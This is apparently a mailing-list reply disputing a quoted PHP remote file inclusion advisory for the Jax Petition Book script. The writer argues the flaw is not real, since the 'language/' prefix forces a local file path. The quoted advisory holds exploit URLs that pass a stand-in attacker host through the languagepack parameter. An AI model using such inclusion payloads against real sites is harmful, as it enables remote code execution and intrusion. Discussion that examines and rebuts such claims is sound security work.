This is not a vulnerability. Since $languagepack is prefixed by "language/",
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.
Can we stop with the PHP 'vulnerabilities' that aren't?
-Blake
Whatchu talkin' 'bout, Willis?
------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip
*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
-------------------------------------------------------------------------------------------------------------------
*Code:
require ( "language/" .$languagepack . ".inc.php" );
-------------------------------------------------------------------------------------------------------------------
*Exploit:
jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
Special Tnx: AYYILDIZ.ORG